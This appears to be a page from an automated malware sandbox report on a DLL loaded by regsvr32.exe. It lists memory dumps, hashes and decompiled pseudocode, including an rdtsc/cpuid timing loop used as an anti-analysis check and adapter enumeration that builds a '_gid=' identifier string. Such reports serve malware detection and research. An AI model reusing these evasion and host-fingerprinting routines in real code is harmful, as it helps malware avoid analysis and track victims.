                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 002210AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 354099737-0
                                                                                                                                                                                                                • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                • Instruction ID: aefa48bf3dafefa61397a9e29dc327072222ff297faf740e33b82ebb3f2355fa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BC012201206A0E2E21D6BE0B84CB282224A714305F0006198202056A08F3907E88602
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 0022260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00221E13), ref: 0022264B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                • Instruction ID: b4d1ca29b5a04648de34c30d0a468cb33e709e45fab053cf04aae8d199c8282c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4E09222724551E2DF24EBA0F8483993320FB84704F840122954E02664EF3CC79DCB00
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 00221000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                • Instruction ID: 6a60ca3d3afc9da7eee1a618b5499edd5eb88d7df68deeecae3922b93920e60c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63D0A772E1024093E7349B50EA1A7992311F3F4315FC04216C94944554CF7CC2B8C604
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %
                                                                                                                                                                                                                • API String ID: 0-2567322570
                                                                                                                                                                                                                • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2105640954.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105629099.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105670542.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105682333.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000003.00000002.2105695777.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 00221E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                			E00221E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                                0x00221e50
                                                                                                                                                                                                                0x00221e50
                                                                                                                                                                                                                0x00221e50
                                                                                                                                                                                                                0x00221e50
                                                                                                                                                                                                                0x00221e55
                                                                                                                                                                                                                0x00221e5a
                                                                                                                                                                                                                0x00221e5f
                                                                                                                                                                                                                0x00221e60
                                                                                                                                                                                                                0x00221e6b
                                                                                                                                                                                                                0x00221e6b
                                                                                                                                                                                                                0x00221e71
                                                                                                                                                                                                                0x00221e73
                                                                                                                                                                                                                0x00221e84
                                                                                                                                                                                                                0x00221e86
                                                                                                                                                                                                                0x00221e8a
                                                                                                                                                                                                                0x00221e8e
                                                                                                                                                                                                                0x00221e92
                                                                                                                                                                                                                0x00221e96
                                                                                                                                                                                                                0x00221e98
                                                                                                                                                                                                                0x00221e9f
                                                                                                                                                                                                                0x00221ea2
                                                                                                                                                                                                                0x00221ea5
                                                                                                                                                                                                                0x00221eab
                                                                                                                                                                                                                0x00221ead
                                                                                                                                                                                                                0x00221eb8
                                                                                                                                                                                                                0x00221eba
                                                                                                                                                                                                                0x00221ec1
                                                                                                                                                                                                                0x00221ec4
                                                                                                                                                                                                                0x00221ec7
                                                                                                                                                                                                                0x00221ec7
                                                                                                                                                                                                                0x00221ee9

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000003.00000002.2102311978.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                • Instruction ID: 2bb7f219f031dde3b6f5bbfedceea3460d366a1c64963905b1eb47441286989e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B01D472B24B908BDF248F76B604349B6A2F38D7C0F148535EB9C43B18DA3CD5958B04
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 2996 Parent PID: 1228 regsvr32.exeCOMMON

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Function 001B27BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                			E001B27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E001B2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x1b70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E001B2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                0x001b27bc
                                                                                                                                                                                                                0x001b27bc
                                                                                                                                                                                                                0x001b27bc
                                                                                                                                                                                                                0x001b27bf
                                                                                                                                                                                                                0x001b27c3
                                                                                                                                                                                                                0x001b27c7
                                                                                                                                                                                                                0x001b27cb
                                                                                                                                                                                                                0x001b27d4
                                                                                                                                                                                                                0x001b27d7
                                                                                                                                                                                                                0x001b27e7
                                                                                                                                                                                                                0x001b27ea
                                                                                                                                                                                                                0x001b27fa
                                                                                                                                                                                                                0x001b2800
                                                                                                                                                                                                                0x001b2806
                                                                                                                                                                                                                0x001b285f
                                                                                                                                                                                                                0x001b285f
                                                                                                                                                                                                                0x001b2876
                                                                                                                                                                                                                0x001b287b
                                                                                                                                                                                                                0x001b2893
                                                                                                                                                                                                                0x001b2893
                                                                                                                                                                                                                0x001b280f
                                                                                                                                                                                                                0x001b2814
                                                                                                                                                                                                                0x001b281f
                                                                                                                                                                                                                0x001b282c
                                                                                                                                                                                                                0x001b282c
                                                                                                                                                                                                                0x001b282f
                                                                                                                                                                                                                0x001b2835
                                                                                                                                                                                                                0x001b283b
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x001b2842
                                                                                                                                                                                                                0x001b2845
                                                                                                                                                                                                                0x001b2849
                                                                                                                                                                                                                0x001b2894
                                                                                                                                                                                                                0x001b2897
                                                                                                                                                                                                                0x001b289e
                                                                                                                                                                                                                0x001b28a9
                                                                                                                                                                                                                0x001b28b5
                                                                                                                                                                                                                0x001b28b7
                                                                                                                                                                                                                0x001b28ba
                                                                                                                                                                                                                0x001b28c1
                                                                                                                                                                                                                0x001b28c8
                                                                                                                                                                                                                0x001b28cd
                                                                                                                                                                                                                0x001b28d0
                                                                                                                                                                                                                0x001b28d0
                                                                                                                                                                                                                0x001b28b5
                                                                                                                                                                                                                0x001b28d7
                                                                                                                                                                                                                0x001b28da
                                                                                                                                                                                                                0x001b28df
                                                                                                                                                                                                                0x001b28e8
                                                                                                                                                                                                                0x001b28ed
                                                                                                                                                                                                                0x001b28f6
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x001b28fc
                                                                                                                                                                                                                0x001b284b
                                                                                                                                                                                                                0x001b2854
                                                                                                                                                                                                                0x001b2859
                                                                                                                                                                                                                0x001b2859

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B280F
                                                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B2845
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdaptersInfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3177971545-0
                                                                                                                                                                                                                • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                • Instruction ID: c60b736c70a9bf67489b71118c13e7adc89abf349c8ce38b573650b6f9e0f5ab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21316B76705B8196EB15EB66E8407D977A0FB89F94F488026EF0D0775AEF38C58AC340
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 001B1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                • Instruction ID: 5be9b9012fc57d3ca06ec49e383a8e517c543350cab4152e28e5ac8411bb9b6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1871DB32311B819BEB24CF66E860BE937A5FB48B94F858129EE4A43B54DF38D595C700
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 001B1678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,00000000,001B2CB1,?,?,00000003,001B24A4), ref: 001B16CB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2109566650.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InformationQuerySystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3562636166-0
                                                                                                                                                                                                                • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                • Instruction ID: de5eaa73b4bf9c880d833e3b3f886915295f1350fa53a2abd89165a0753c6d5c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA217C75315B4093EF04AB56E8643E972A2BB89BC1F9A8034EE0A87715EF3CC8458700
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF8F91370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2117243734.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117234477.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117252147.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117282688.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2117292804.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction ID: d58402523aa45de61867f6b8ded07bb346793c2564f4517cd5f4910259ccd42d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F451E1B251D6C48AE3A18B24E89479BBFA0F386358F145158E6CD4BBA9C37DC514CF44
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Function 000007FEF8F911B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
